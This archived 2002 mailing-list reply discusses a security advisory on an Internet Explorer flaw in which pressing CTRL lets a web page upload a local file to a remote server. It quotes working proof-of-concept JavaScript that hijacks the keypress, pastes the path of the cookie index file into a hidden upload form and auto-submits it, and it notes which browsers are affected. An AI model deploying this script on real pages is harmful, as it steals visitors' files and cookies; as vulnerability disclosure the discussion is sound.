On Tue, Jul 23, 2002 at 09:50:30PM +0200, Andreas Sandblad wrote: > > - Sandblad advisory #8 - > > ---..---..---..---..---..---..---..---..---..---..---..---..---- > Title: Pressing CTRL in IE is dangerous > Date: [2002-07-23] > Software: Internet Explorer > Impact: Pressing CTRL in IE may result in arbitrary local > file to be uploaded to a remote server (no exact > path needed). If special sensitive information is > uploaded, it may be used to run remote programs. [snip] > 1. When an user presses the CTRL key an onkeydown event can be set to > fire. In the event function the key pressed is changed to 'V'. The result > will be a paste operation with less restrictions. > > 2. The content of the clipboard is altered and focus is changed to a > hidden file upload form. The paste operation will be performed into the > form, yielding a change of value for the file upload field (not normally > allowed). > > 3. The upload form is submited automaticly (legal javascript operation). [snip] > <!div id=h style="zoom:0.0001"> > <!form name=u enctype="multipart/form-data" method=post action=upload.php> > <!input type=file name=file></form></div> > <!script> > //uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat"; > uploadFile="..\\Cookies\\index.dat"; > function gotKey(){ > if (!event.ctrlKey) return; > document.onkeydown = null; > event.keyCode = 86; > window.clipboardData.setData("Text",uploadFile); > (p=document.forms.u.file).focus(); > p.onpropertychange = function(){document.forms.u.submit()}; > } document.onkeydown = gotKey; > window.onload=function(){document.body.focus()}; > <!/script> This was verified to work on various versions of IE 5 and 6, and also on Opera 6.01 build 1041. However, Mozilla 1.0rc1 is NOT vulnerable, partly because of a script error (the onkeypress handler should accept a parameter instead of referring to 'event' directly), and mostly because of the fact that in Mozilla, event.keyCode is not settable. G'luck, Peter -- Peter Pentchev roamat_private roamat_private PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 If you think this sentence is confusing, then change one pig.
This archive was generated by hypermail 2b30 : Wed Jul 24 2002 - 11:54:38 PDT